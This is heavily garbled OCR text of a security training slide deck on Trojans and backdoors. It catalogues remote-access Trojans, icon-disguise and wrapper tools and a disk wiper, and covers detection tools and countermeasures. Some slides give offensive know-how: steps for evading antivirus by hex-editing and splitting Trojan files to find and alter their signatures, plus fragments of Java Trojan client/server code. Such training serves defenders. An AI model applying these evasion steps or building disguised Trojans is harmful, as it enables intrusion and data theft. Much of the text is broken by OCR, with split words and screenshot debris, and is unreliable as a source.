open. Now, right-click on the 
Notepad icon within WordPad 
and copy it to the desktop. 

© The icon that appears is very 
si nni I ar to the def au 1 1 text i con . 
The icon can be changed by 
usi ng the properti es box. 
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WordPad 



l^ile Edit Vif. 



Ins^ert I— ._■ r 1 1 1 ._i l_ Help 









^11 








— 1 |T i_i — 1 |-w"estern 






^ ■ ■ ■ : ■ ■ 


1 


, ... ^ ..... . 


■ 3 ■ 





Zi_lt 

= ■=■!=■ V 



File Edit View Insert Format Help 



□ li^lHl 4*\ ^|%.|e,|>^| i%| 








|Arial ^ |10 _;J [Western 




3 b|^|u|^ 








3 ■ ■ 


. , . . . 4 . . . 


1 ■ ■ ■ 5 ■ ■ ■ 1 ■ ■ 






1 XlfPitl^l--^ 


1 





















1 a 


*3 ^ 
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RemoteByM ai 



I 



© Control and access 
your computer 
through email 

© Can retrieve files 
or folders by 
sending 
commands 
through email 

© It is an easier and 
more secure way of 
accessing files or 
executing 
programs 



RemoteByMail 



File Acliions Tools Help 



JnJxJ 



Start server Stop 



Listening to accounts: 
test (^ou@isannple.com) 
■>"@sample.com 



Check now 



Statistic: ^^^^^^^^^V 


Running since: (Stopped) 


• 


Emails received: 0 




Cmds executed: 0 




Emails sent: 0 




NeKt email check: n/a 




Now checking: 




Last response: 




State: 




Last error: 




Progress: 





Emails received: 
Date 




pommand queue 
Date 




IPjtgoing emails: 
Name 



Memory in use; 392020 |tJnlicensed Evaluation Copy 



Stopped 
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Tool : I con P us 



I 



© Icon Plus is a 
conversion program 
for translating icons 
between various 
formats 

© This kind of 
application can be 
used by an attacker to 
disguise his malicious 
code or Troj an so that 
users are tri eked i nto 
executing it 



Icon Plus! - Coded by The EkCoo 



Original File 






1 






*l*l 


Current Icon: |o 


Total Icons: |o 



ricon Files- 



I 

P Replace 32x32 icons |7 Replace 1 6x1 G icons 



r Resulting File- 



rLast Operation (Compression / Compilation)- 



3 
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Defacing Application: Restorator 



© It is a versatile skin editor for 
any Win32 progranns: change 
innages, icons, text, sounds, 
videos, dialogs, nnenus, and 
other parts of the user 
i nterf ace 

© Using this can create one's own 
User-styled Custonn 
Applications (UCA) 

© Restorator has nnany built-in 
tools 

© Powerful find and grab 
functions let the user retrieve 
resources fronn all files on their 

disks 



S Restorator 2.50 - C:\Restorator\Testfiles\linageTest.res 



File Resources Viewer Biowsei Bookmarks lools Options Help Debug 



SI 



Flies 



Locatiori C:\Restoiatoi\Testfiles 



■Jt Ac[oRd32,eKe 
■■^ aim.eKe 
V C00L9G.EXE 

Copia di Rebiilh.ene 
X copj_sessions.eKe 

dialer. e«e 
J fpKp[ess.e«e 
gs¥iew32.eKe 
gswin32.e«e 
gswin32c.eKe 
gvwgs32.eKe 
hhupdexe 
HYPERTRM.EXE 
lebsetup.exe 
IEBATCH.EXE 
IEXPLORE.EXE 
ImageTesUes 
B-[J Icon 
B-Q Bilmap 

^ impoit32.exe 
B-% KnutschPad,e«e 
B-|a] logagent.eKe 



[nii!i!i!irinri»»nHnt 



Sizet Type 



Modified 



Attiib... 



J.. 

□ c 

DEkos 

□ FindTesI 
LJ IcoCui 
LJ MenuExe 

□ ResPatchei 

□ Usei32 

[3 ImageTesI Backup, res 
jJCLJPBACIKBackupies 
if 34.M 



Caitella 

Caitella 

Caitella 

Caitella 

Caitella 

Caitella 

Caitella 

Caitella 
0KB Resouice File 
1KB Resouice File 
2KB Documento di teste 



04/08/9B 18.2244 
04/08/3918.23,34 
04/08/881 8231 G 
04/08/881 8.23 2G 
04/08/9818.23,23 
04/08/8818.23,30 
04/08/8818.23,30 
04/08/88182332 
04/08/88183824 
28/07/881815,28 
20/05/8821.11,20 



A 
A 

A J 



Bitmap\SPLA9H\Neutial 



Bitmap 



404K 204-24 bitcolois 



G1 open files ^ 
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© Tetris program can 
be used as a Trojan 
wrapper 

© Addictive game 

© Easy to send by mai I 
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Lazaris 


[ 


-iul 


_x 1 




Start 


Pause 


Reset 




? Help 1 


1 












Level 

Ii 




Score 








X Close 1 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



HTTP Trojans 



© The attacker must install a simple Trojan program on a 
machi ne i n the i nternal network, the Reverse WWW 
shell server 

© Reverse WWW shel I al I ows an attacker to access a 
machi ne on the i nternal network from the outsi de 

© On a regular basis, usually 60 seconds, the internal 
server wi 1 1 try to access the external master system to 
pick up commands 

© I f the attacker has typed somethi ng i nto the master 
system, this command is retrieved and executed on the 
internal system 

© Reverse WWW shell uses standard http protocol 

© 1 1 1 ooks I i ke an i nternal agent i s browsi ng the web 
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Trojan Attack Through Http 




vi cti m server 
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Tool: Hard Disk Killer (HDKP4.0) 



I 



© The Hard Drive Killer Pro series of programs offers one 
the ability to fully and permanently destroy all data on 
any given Dos or Win3.x/9x/NT/2000 based 
system. . .i n other words, 90% of the PCs worl dwi de 

© The program, once executed, wi 1 1 start eati ng up the 
hard drive and/ or infect and reboot the hard drive 
withi n a few seconds 

© After rebooting, all hard drives attached to the system 
would be formatted (in an un-recoverable manner) 
withi n only 1 to 2 seconds, regardless of the size of the 
hard drive 

^Ta^ic tool presented here as proof of concepT 
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1^ 

■ 



©Covert Channels are nnethods in which an attacker can hide the 
data in a protocol that is undetectable 

©Covert Channels rely on techniques called tunneling, which allow 
one protocol to be carried over another protocol 

© I CM P tunnel i ng i s a nnethod of usi ng I CM P echo-request and 
echo- reply as a carrier of any payload an attacker nnay wish to use, 
in an attennpt to stealthi ly access, or control, a connpronnised systenn 
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Trojan: Phatbot 



© This Troj an al I ows the attacker to have control over 
computers and link them i nto P2P networks that can be 
used to send large amounts of spam email messages or 
to flood websites with data in an attempt to knock them 
off I i ne 

© It can steal Windows Product Keys, AOL logins and 
passwords, as wel I as CD keys of some famous games 

© 1 1 tr i es to d i sabi e anti vi rus software and f i rewal I s 




rojan presented here as proof of concept 
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Trojan: Amitis 



© 1 1 has more than 400 ready- 
to- use options 

© It is the only Trojan that as a 
live update 

© The server copies itself to 
the Wi ndows di rectory, so 
even if the main file is deleted, 
the victim is still infected 

© The server automatically 
sends the requested 
notification as soon as the 
victim gets online 

Sou rce: http:/ / www. 1 mmortal - hackers. com 







1192.168.1.23 |98765 


E 


Connect || Disconnect | Suspend 0 P 



1 5 Have Some Fun 

5 Annoy 

$-W Files 
S-H Keylogger 
□■■■P Programming 

5 Compile Javascript 

5 Compile Vbs 

S Compile HTML 

f Play With HWNDs 

S Play With Classes 

S-P Program Manager 
□■■■P Main Options 
I S-P Informations 
1 S-P System Files 
i S-P Passwords 
I S-P Time and date 
i S-P Print On Desktop 
I S-P Keyboard Simulator 
Jf Melody Studio 

^ ftfln I II _ _ _ 



Connectina tol92.1G8.1.23 



- Initializing Settings ,.. 
■ Wsock32,dll initialized 

- Done 
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Trojan: Senna Spy 



I 



©Senna Spy Generator 2.0 is a 
Trojan generator. Senna Spy 
Generator is able to create a 
Vi sua! Basi c source code for a 
Trojan based on a few options 

©This Trojan iscompiled fronn 
generated source code, anything 
could be changed in it 

Source: http://sennaspy.cjb.net/ 



Server Features 

Change wallpaper 
Chat with server 
Execute DOS commands 
Find flies 
FTP server 

Hang up Internet connection 
Open/close CD-Rom 
Play AVI or WAV 
Reset windows 
Send keys 




rojan presented here as proof of concept 
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1 



Trojan: QAZ 



© 1 1 is a companion virus that can spread over the 
networl< 

© It also has a "backdoor" that will enable a remote user 
to connect to and control the computer using port 7597 

© 1 1 may have ori gi nal ly been sent out by emai I 

© 1 1 renames Notepad to note.com 

© Modifies the registry key: 

H KL M \ software\ M i crosoft\ Wi ndows\ Current 

Version\Run 
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M icrosoft Network H acked by QAZ 
Trojan 



http : / / www ■ msn be. com/ msn/ 48 2 0 11 asp Oct. 29, 2000 



The intruder who broke into M icrosoft's internal network may have 
done so through an employee's home machine connected to the 
network, M icrosoft officials told the New York Times. I n a report 
published Sunday, the software company's corporate security 
off i cer al so tol d the Ti mes that the break- i n was f i rst noti ced when 
irregular new accounts began appearing more than a week ago. 
M I CROSOFT ACKNOWLEDGED on Friday that its security had 
been breached and that outsiders using a "Trojan horse" virus had 
gotten a look at but did not corrupt a valuable software blueprint, 
or "source code," for a computer program under development. 



Case study 
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Trojan: Back Orifice 



Y cDc Back Orifice Win32 GUI Client 




Command "^^'^f^ 

Jpiugin execute 33 
.:S*^UfiiJsed 



©Back Orifice (BO) is a remote 
Administration system which 
allows a user to control a computer 
across a TCP/ 1 P connection using 
a si mpl e consol e or GUI 
application. On a local LAN or 
across the I nternet, BO gives its 
user more control of the remote 
Windows machine than the person 
at the keyboard of the remote 
machine. 

©Back Orifice was created by a 
group of well-known hackers who 
call themselves the CULT OF THE 
DEAD COW. 

©BO is small, and entirely self 

installing. 

Source: http://www.cultdeadcow.com/ 
^Classic Trojan presented here as proof of concep^ 



EXIT 
ST 




Pin^_j,y 
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Trojan: Back Oriffice 2000 



UUf^K LontiguratiDn Wizard - btep 




Welcome to the B02K Configuration Wizard! 

This wizard will help you install components into 
your B02K server and configure them. First, you'll 
be asked to choose a B02K server, then we'll 
walk you through the process of configuring the 
server with a new password. 

When you're done, your B02K server will be ready 
for installation. Note that this wizard does not allow 
for full configuration flexibility. It is meant only to 
simplify the process of configuration. 



1^ Show this wizard on startup 



Next >> 



B02K has stealth capabilities, it will 
not show up on the task list and runs 
completely in hidden mode 



] Command! 

131337^ 




Back Orifice accounts for tine liigliest number of 
i nfestati ons on |V| i crosoft computers. 

TlieB02K server code is only 100KB. The client 
program is 500KB. 

Once i nstal I ed on a vi cti m PC or server machi ne, 
B02K gives the attacker complete control of the 
system. 




lassie Trojan presented here as proof of concept 
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Back Or iff ice Plug- ins 



© B02K functionality can be extended using BO plug-ins 

© BO Peep (Complete remote control snap in) 

© Encryption (Encrypts the data sent between the B02K 
GUI and the server) 

© BOSOCK32 (Provides stealth capabilities by using 
ICMP instead of TCP U DP) 

© STCPI O (Provides encrypted flow control between the 
GUI and the server, making the traffic more difficult to 
detect on the network) 
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Trojan: SubSeven 



©SubSeven is a Win32 
Trojan 

©The credited autlior of 
tliis Trojan is jviobman 

©I ts down tlie computer 
and causes and a constant 
stream of error messages 

©SubSeven is a Trojan virus 
most commonly spread 
tlirougli fi le attacliments i n 
emai I messages and tlie 
I CQ program 



version 



+ icontract/eKpand"] [Tliow/hi"3e fun m; 



[ Options 1 [cibout] [close] 

list of all the victim's files and 
directories [marked with < >]. 
I double click a directory to 



lenter the IP # and oress 'connect' 



connection manager 

127.0.0.1 1999 



ip scanner I ip #s address book 
get iiifiinnatiDii ahout victim's computer 
change server port I set server password 



file man 



update server 



ICQnoti^ 



close server 



IRC m)tify 



remove server 



e-mail notify 



keys/messages manage 



on I clear I offliiieke^ 1^ 



message manager I keyboard off 



'ass Idcldn' manager 



see desktop 



webcam 



registry edit 



flip screen I FTP server 



get recorded passwords 



get cached passwords 
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Trojan: CyberSpy Telnet Trojan 



© CyberSpy i s a tel net Troj an whi ch means a cl i ent 
terminal is not necessary to get connected 

© 1 1 i s wr i tten i n VB and a I i ttl e bi t of C programmi ng 

© It supports multiple clients 

© 1 1 has about 47 commands 

© It has I CQ, email, and I RC bot notification 

© Other thi ngs I i ke fake error/ port/ pw/ etc. can be 
configured with the editor 
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Trojan: Subroot Tel net Trojan 



' ©1 1 is a telnet remote 
administration tool 


Connection About 




subroot seruee [u1.3] on port 741B... 
username : 




©It was written and tested 
in the republic of South 
Africa. 

m mil I ^^^^ ■ 






©It has variants 






• SubRootlO 






• SubRootlB 








Connected 1 27.0.0.1 1 27.0.0.1 Connection accepted by remote host 


M 
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Trojan: Let Me Rule! 2.0 BETA 9 



© Written in Delphi 

© Released in J anuary2004 

© A remote access Troj an 

© 1 1 has DOS prompt that 
al I ows control of vi cti m's 
command.com 

© It deletes all files in a 
specific directory 

© Al I type of fi les can be 
executed at the remote host 

© The new version has an 
enhanced registry explorer 



Let Me Rule! v2.0 BETA 8.1 



Host: localhost 




Server | CD-ROM | Ke^iboard Mouse | Sound Screen | Msg-Bon M I ^ 



LjT^ Monitor: 


Turn on 


Turn off 






— Screensaver: 


Open 


Close 


Check 




Desktop: 


Show 


Hide 


Enable 


Disable 


Taskbar: 


Show 


Hide 


Enable 


Disable 


Startbutton: 


Show 


Hide 


Enable 


Disable 


Flash screen Set resolution 


Show picture Set wallpaper 


Refresh (F5) Move screen 


Screen shot Realtime desktop 



Connected to localhost [v2.0 BETA 8.1 ] 
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Trojan: Donald Dick 



1^ Donald Dick 1. 


53 




File System | 


Registry | Processes | Windows | 


Keyboard 


Miscellaneous 


1 Passwords | System ] Server 


About 




J 

&.YAwoasKY mm 








pConnection 
[tcp ifOUJUAJ 


d 


■ Ping 



The attacker uses the cl i ent to 
send connnnands through TCP or 
SPX to thevictinn listening on a 
pre-defined port 

Donald Dick uses default port 
either 23476 or 23477 



Donald Dick is a tool that enables 
a user to control another 
computer over a network 
1 1 uses a cl i ent server architecture 
with the server residing on the 
victim's computer 



El Donald Dick 1.53 



Miscellaneous 
File System 



Passwords | System | Server 
Registry Processes Windows 



About 
Keyboard 



^ Path:[ 



&| g]| Mask: pV*~ 



Name 



Size 



Date 



Time 



(-Connection - 



|5PX _^ 



3 



Ping 
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Trojan: RECUB 



© RECUB (Remote Encrypted Callback Unix Backdoor) is 
a Windows port for a remote administration tool which 
can be also used as a backdoor on a Wi ndows system 

© 1 1 bypasses f i rewal I by openi ng new wi ndow of I E and 
then injecting code into it 

© 1 1 uses N etcat for remote shel I 

© 1 1 empti es al I event I ogs after exi ti ng the shel I 

Source: http://www.hirosh.net 



^Cl assl c Troj an presented here as proof of concept 
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Hacking Tool: Loki 



I 



(www.phrack.conn) 

©Loki was written by daennon9 to provide shell access over I CM P, 
nnaking it nnuch nnore difficult to detect than TCP- or UDP-based 
backdoors. 

©As far as the network is concerned, a series of I CM P packets are 
shot back and forth: a pi ng, pong response. As far as the attacker 
is concerned, connnnands can be typed into the loki client and 
executed on the server. 




^lassie tool presented here as proof of concept! 
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© Configure firewall to block ICMP or limit the allowable 
I P's incoming and outgoing echo packets 

© Blocking ICMP will disable ping request and may cause 
i neon ven i ence to users 

© It is recommended to be careful while deciding on 
security versus convenience 

© Loki also has the option to run over UDP port 53 (DNS 
queries and responses) 



Loki Countermeasures 
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© Access to the remote 
computer desktop 

© Local files can be 
uploaded to the remote 
system 

© F 11 es can be remotely 
zipped or unzipped 

© Allows sending or 
recei vi ng the CI i pboard 
contents I i ke text, 
pictures, and Windows 
CI i pboard formats 
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)te Commander 



I 



ATEL ER WE B R E M OT E C 0 M MAN D 



9^^ 



Ditkta{i Sys\nUi \ \i«m<kk\% I Fil( Sjfstnn | Lasers and Omp Ohsl { CiM^iin 
General Haiiltf'Sie PcviK* PiQcesss^ j Semes Physical Memiy Viewer 



^■^ 

ill 

B 
i 
Q 

iii 



lOcATA/AWi conlrollor::; 



Kjayboards 

Mki and m& itointing Mm 
Mcnilars 

Nan-Plug and Play DrivEi3 
PirlMCOM&LPI) 

\>iflt#))i«n(rM) cpua.cecHi 

V tatel[R)Xe(inP) CPLiOGGHi 
\>|ii!el(R))i*onp) CPUlOSGHi 
Vliitel[R)X€(inP) CPU3.QGGHi 
3C5I anil RAID citn[rollBr4 













U«f Narne 



r192.IGS1 105 



^(^ Conned Qisraniiid 



Inilialiiing... 

ConnectEii to 192.166.1.105 
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Trojan Horse Construction Kit 



I 



© Such kits hel p hackers to construct Troj an horses of 
their choice 

© These tools can be dangerous and can backf i re if not 
executed properly 

© Some of the Troj an kits available in the wild areas 
follows: 

• The Troj an Horse Construction Kitv2.0 

• ProgenicMail Trojan Construction Kit - PMT 

• Pandora's Box 
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H ow to Detect Troj ans? 



1 


Scan for suspicious open ports usi ng tools such as 




• N etstat 




• Fport 




• 1 LrVieW 


2. 


Scan for suspicious running processes using 




• Process Viewer 




• What on my computer 




• Inzider 


3. 


Scan for suspicious registry entries using the tools below 




• What running on my computer 




• MbLontig 


4. 


Scan for suspicious network activities 




• Ethereal 


5. 


Run Trojan scanner and detect Troj ans 
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ToohNetstat 



I 



© Netstat is used to display active TCP connections, I P 
routing tables, and ports on which the computer is 
listening 



U 



J C:\WINNT\system3Z\cmd.eKe 



C:S>netstat -an 



Active Connections 



Pro to 


Local Address 


Foreign Address 


State 


TCP 


e.e. 0.0:7 


0.0.0.0:0 


LISTENING 


TCP 


e.e. 0.0:9 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:13 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:17 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:19 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:23 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:135 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:445 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1025 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1026 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1029 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1030 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1224 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1681 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1683 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1685 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1686 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:1801 


0.0.0.0:0 


LISTENING 


TCP 


0.0.0.0:2103 


0.0.0.0:0 


LISTENING 
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Tool : f Port 




© fport reports all open TCP/ 1 P and UDP ports and 
maps them to the own i ng appi i cati on 

© fport can be used to quickly identify unknown open 
ports and their associated applications 



H C:\WINNT\system32\cmd.eKe 



E:NNew S}iareNfportNFport-2.0>fport 
FPort u2.0 - TCP/IP Process to Port Mapper 
Copyright 2000 by Foundstone, Inc. 
Iittpi/'/'iiiiii.f Dundstone .con 



Process 

tcpsucs 

tcpsvcs 

tcpsucs 

tcpsucs 

tcpsucs 

tlntsur 

sucliost 

Gysten 

System 

nsdtc 

MSTask 

nqsuc 

inetinf o 

nsnnsgr 

nsnnsgr 

nsnnsgr 

nsnnsgr 

nqsuc 



Port 

7 

9 

13 

17 

19 

23 

135 

139 

445 

1025 

1026 

1029 

1030 

1224 

1681 

1683 

1685 

1801 



Pro to 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 

TCP 



Path 

C:\UINNT\Systen32\tcpsucs.exe 
C:SUINNTSSysten32Stcpsucs.exe 
C:\UINNT\Systen32\tcpsucs .exe 
C:NUINNT\Systen32\tcpsucs .exe 
C:\UINNT\Systen32\tcpsucs.exe 
C: NWINNT\systen32\tlntsur.exe 
C:\UINNT\systen32\sucliost.exe 



C:\UINNT\Systen32\nsdtc.exe 
C:NUINNT\systen32\MSTask.exe 
C:\UINNT\systen32\nqsuc .exe 
C:NUINNT\systen32\inetsru\inetinf o .exe 
C:\Progran Files\MSN Messenger\nsnnsgr.exe 
CiNProgran Files\MSN Messenger\nsnnsgr.exe 
C:\Progran Files\MSN Messenger\nsnnsgr.exe 
C:\Progran Files\MSN Messenger\nsnnsgr.exe 
C:\UINNT\systen32\nqsuc .exe 
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ToohTCPView 



I 



© TCPView is a Windows 
program that wi 1 1 show 
detai I ed I i sti ngs of all TCP 
and UDP endpoints on the 
system, including the local 
and remote addresses and 

state of TCP connections 

© When TCPView is run, it 
wi 1 1 en u merate al I acti ve 
TCP and UDP endpoints, 
resolving all! P addresses 
to thei r domai n name 
versions 
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A TCPView - Sysinternals: www.sys1nternals.com 



File Q^isv Bw»t tiilp 













□ ■KMi.ntB.l^ 


tff 


inal:]sp smlp 




U^TfNINli 


□iMiita.eM.1S2 


T£P 






USTENIHC 




TCP 






USTENING 




Tiff 






UJTENIHC 




TO* 






USTENINIi 


DsveitBlsaiSflO 


TCP 




iniAlap,0 


USTENING 


n[WRSw.ti«131E 


TtP 




iiwlclip'8 


USTENING 


□ ll?iWo.B«-lK 


Tff 






USTENIMq 




TCP 






IISTENIHG 




TCP 




nMlv.D 


USTENINIG 


®UiTiOtv.w:3S?? 


TCP 






USTENIKG 




TCP 






tISTENIHG 


ijmchosl.ca.SCO 


TCP 






USTENING 




TCP 






ESTAELISHCD 




TCP 




?l6.lJ!.16.i3?Pp 


ESIABLISHED 


T(P 






TIME WAIT 




TCP 






USTENIMG 




TCP 




nMlv.O 


USTENING 




TCP 






USTENING 




TCP 






llSr^NINIi 




TCP 






USTENING 


□ Sysiwi i 


TCP 






USTENING 




ir? 


m:¥l,lip lirji 




UiTEHIHG 




W 


lUilatiZE 








TCP 






ESTABUSHED 




UOP 








-J istltm-i 


UPP 










UOf 




LI 






UDP 








□ lMfi3w.w:1315 


UDP 








ni>SFIS^(«sUlt 


UDP 


<^Mfim 






Qinetrfii.nts.lSSS 


UDP 


iMdtla[[:lD9l 


LI 






UDP 










UDP 










UDP 




L^ 






UDP 


Iin).l¥l4t2 


LI 






UDP 










UDP 










UDP 




LI 




□ l>SfiS»t.4lHl3lt 


UDP 




L 1 
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Tool: Process Viewer 



© Preview is a process 
viewer utility that 
displays detailed 
information about 
processes running under 
Windows 

0 Preview comes with a 
command line version 
that al lows the user to 
write scri pts to check if a 
process is running, kill 
it, etc. 

© The Process Tree shows 
the process hierarchy for 
all running processes 



Process Viewer 



Rie View Process Help 



ID 



Priority 



II Path 



taobat.exe 1796 

tooTray.exe 2008 

alg.exe 1020 

mm im 

Cirss.exe 416 

D;plflrer,[>!E 1S56 

lEXPLORE.EXE 4004 

inetinfo.ese 1056 

feass.exe 496 

mmos.exe 2076 

msmsgs.eKe 1996 

mmm \m 

notepad.exe 1168 

ftcView.exe 3964 

rsvp.exe 256 

sirvfces.exe 484 



Threads -lEMOREEXE 



ID 




200 


11 




248 


9[AboveNoirfal! 




280 


15(TimeCrfc3l) 




3456 


8(Noimal) 




348 


10(Nwmal! 




3430 


OjNomal) 




3536 


lOfAtoveNomal) 




3G80 


BlNoimal) 


ll 



Normal 
Wormal 
Normal 
Wormal 
Normal 
Woraal 
Normal 
Normal 
Normal 
Normal 
Normal 
Normal 
Normal 
Normal 
Normal 
Normal 
Normal 
Normal 
Normal 



d;\Progr3m Fites^i^dobelAcrobat 5,0\Acrob3t\, , , 
DiiProgram Filesl/idobeitoobal: 5,oiDistHAc,., 
C;\WINCOW5\Sy5tem32l3lg,exe 

CilProgram FSestommon Files\A±itelWel)lA, , , 

C;\WINDOWSW!l:em32^csrss.exe 

Ci'iWINDOWSlE^lorer.ES 

C;\Progr3m Ftesinfcernet Expbrei^IEXPLO^E, , , , 

C:'(WINM I 
D:\Proga 
C;\Progra 
C:\Progra 
C;\WINK 
D;\Ethic3i 
C;\WIND( 
C;\WINK 
C:'(WINK 
D:\hypeFi 
C;\WINCi( 



- Vasion information - 
FileVeision; 

Cfeated: 



©MicrKoft Corporaliion, 



Company name: 
Internal narre: 
Language: 
Original Filename: 
Pfoduct mm: 
Desciiption: 
Product Name: 



S00.2G0Q0000Mient.010817-114S) 
8/23/2001 800 PM 
mm S;OOPM 
ti'ioiosoft Coipoiation 
e'iploiei 

English [United Stetes) 
EJiPLORER.EXE 



VindoHS iKploiei 

t^icrosoft* Windows® Ope'ating System 
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© Tool: What's on My 
Computer 

© It gives information 
about any file, folder, or 
program on your 
computer 

© Al I ows to search for 
information on the web 

© Keeps out from vi ruses 
and Trojans 

© Keeps your computer 
secure 
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File View Favorites Help 





0 J 


D 




^£7 




J 




All 


Documents Recycle Bin 


others 


Programs 


Running 


Auto-start 


Files 


Registr^i 



Folders | 


Name 1 


Size 1 Type 


1 Modified 1 




[j3 desktop 
+ My Documents 
+ [Jj My Computer 

^ My Network Places 
i -j^ Recycle Bin 
'■■■■■0 Internet Explorer 


^My Documents 
^,My Computer 
^My Network Places 
f5 Recycle Bin 
0 Internet Explorer 


System Folder 
System Folder 
System Folder 
System Folder 
System Folder 




1 


^Microsoft Outlook 


System Folder 








^ Adobe Reader 6.0 


2KB Shortcut 


3/29/2005 1:08 PM 






[J AVG Free 


2KB Shortcut 


^/29/2005 12;41 PN 






IfljAvRack 


2KB Shortcut 


2/1/2005 12:32 PM 






9! WinZip 


1 KB Shortcut 


2/1/2005 3:10 PM 










7h l7nf\'=, ^'41 Pfvl 





Search \\ 



"3 Hs» 0 0 0 g P 



To find information about the selected item on the Internet, 
use the Search field and the Go button above. 

Name: Desktop 
Full Name: Desktop 

Path: C:\Documents and Settings\test\Desktop 



C;\Documents and Settings\test\Desktop 
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Inzider- Tracks Proo 


Bsses and Ports 







htt p :/ / ntsecu r i ty. n u/ cgi - bi n/ d own I oad/ i nzi der . exe. pi 

© This is a very useful tool that lists processes in the 
Windows system and the ports each one listens on 

© For instance, under Windows 2000, Beast injects itself 
into other processes, so it is not visible in the Task 
M anager as a separate process 
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Tool: What's Running on My 
Computer 



Whit"! Hunning; 



© It gives complete 
information about 
processes, servi ces, I P 
connections, modules, 
drivers, etc. running 
on your computer 



i ^isn Mi \mt 
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Screenshot showing I ist of processes running 
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Tool : M SConf i g 



^0 M i crosoft System 
Configuration Utility or 
M SCON FIG is a tool used 
to troubleshoot problems 
with your computer 

© It ensures your computer 
wi 1 1 boot faster and crash 
less 
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j System Configuration Utility 



2<1 



General SYSTEM,] 



BOOT.INI Services startup 



Service Essential 


Manufacturer 


Status 




lil Alerter 


Microsoft Corporation 


Stopped 




0 Application Hanageimenl: 


Microsoft Corporation 


Stopped 




0 AV(j7 Alert Manager Server 


GRISOFL 5,r,o, 


Running 




E|avG7 Update Service 


GRISOFL 5,r,o, 


Running 




0 Background Intelligent Tr,,, 


Microsoft Corporation 


Stopped 




0 Computer Browser 


Microsoft Corporation 


Running 




0 Indexing Service 


Microsoft Corporation 


Stopped 




0ClipBook 


Microsoft Corporation 


Stopped 




0 DHCP Client 


Microsoft Corporation 


Running 




0 Logical Disk Manager Adm,,, 


VERITAS Software Corp, 


Stopped 




0 Logical Disk Manager 


Microsoft Corporation 


Running 




0 DNS Client 


Microsoft Corporation 


Running 


d 


^1 \>\ 





r Hide All Microsoft Services 



Enable All Disable All 



OK 



Cancel 



Apply 



Help 
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Anti -Trojan Software 



© There are many anti -Trojan software programs available with 
many vendors 

© Bel ow i s the I i st of some of the anti -Troj an software that i s 
aval I able for trial: 

• Trojan Guard 

• Trojan Hunter 

• ZoneAlarnnfWin98&up, 4.530 

• WinPatrolfWinAII,6.0 

• LeakTest, 12 

• Kerio Personal Firewall, 2.15 

• Sub-Net 

• TAVScan 

• SpyBot Search & Destroy 

• Anti Trojan 

• Cleaner 

Copyri ght © by BC-Cbunc i I 
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E vadi ng Anti-Vi rus Techniques 



© Never use Trojans from the wild (anti- virus can detect 
these easily) 

© Write your own Trojan and embed it into an application 
© Change Trojans syntax 

• Convert exe to VB scri pt 

• Convert exe to doc 

• Convert exe to ppt 

© Change the checksum 

© Changethecontent of the Trojan using hex editor 
© Break the Trojan file into multiple pieces 
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SampI e Code for Troj an CI i ent/ Server 



2 TrojanClient.java - Notepad 



File Edit Format Help 



Dili 



^ TrojanServer.java - Notepad 



File Edit Format Help 



* TrojanClient executes remote commands on server 

* Requires TrojanServer to be running 



V 

import java.io.**; 
import java.net. 
import javax.swing.*'; 

public class TrojanClient { 

I j place all the code in the SPE 

public static void main(String[] args) throws lOException { 

//check if 'port' and 'host' are passed 

if (!(args.length > 2)) 

{ 

System. out printlnC'Usage: java TrojanChent <hostname> <] 
System. out. println("Example: java TrojanChent Omegasvr 2\ 
System. exit(o]; 

} 

String host = args[o]; 
String port = args[i]; 



Troj and i ent.j ava 



''Trojan horse server 

^ Accepts Remote command from chent 

V 

importjava.net.**; 
importjava.io.*; 

pubhc class TrojanServer { 

// -This is my SPE 

pubhc static void main(String[] args) throws lOException 
{ 

/ / check if 'port number' is passed 

if (! (args. length >= 1)) 

{ 

System.out.println("Usage: java TrojanServer <port>"); 
System.exit(o]; 

} 

String port; 
port = args[o]; 

TrojanServer b = newTrojanServer(port); 
}//end main 
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Troj an server .j ava 
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E vadi ng Anti -Troj an/ Anti vi rus usi ng 
Stealth Tools v2.0 




© 1 1 is a program that helps 
to send Trojans or 
suspi ci ous f i I es that are 
undetectable to antivi rus 
software 

© I ts features i ncl ude add 
bytes, bind, change string, 
create VBS, scramble/ pack 
files, split/ join files 



^ fcj n 



New Foldei 



File Edit View Favorites Toois Heip 



4-83* • 4 ■ a I ©5Mr* QFolders § | 4J Pi K « 1 1- 



Address □ New Foider 



Arritis flnitis Amitis 1,4,3 
1,4.3.000 1.4,3,001 



Select an item to view its descripiiion. 

See also: 
My Documents 
My Metwork Places 
My Computer 



Stealth Tools v2,0 - by Gobo —————— 

Select File |c;\Amitis i,4.3,eae 



□ 00 



About 



Add Bytes 



Change String 



Pack/Scramble 



Split/Join 



Split/ Join 

Take a large fie and divide It into equal parts. This is EXTREMELY 
handy when It comes to hexing a file^ as opening a large [500k) server 
Into a hex editor can be quite a daunting task to those relativly new to 
editing. You only need to add a small sectlorij as a viral signature is 
generally 0-32 bytes long. 

Split a lile until only a single unit (* ,DDX) is detected by your anti vIruSj 
this is the section of the file that contains Its signature and this Is the 
part that should then be loaded Into the hex editor, changed, saved and 
reassembled back Into a now undetectable server. 



Please select size for individual 1 720 Kb ^ 
file sections 



Split 





3 object(s) 






|l,71HB g My Computer 




0 0^^ l&y. 


3ro.,.| gst .l gF... 1 j]Tr,.,| gF,.. | gla.,,||FileS... 


aN,.,|Qa..,| i<3;^l'^lf 11:54 AN 
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Backdoor Countermeasures 



© Most commercial antivirus products can automatically 
scan and detect backdoor programs before they can 
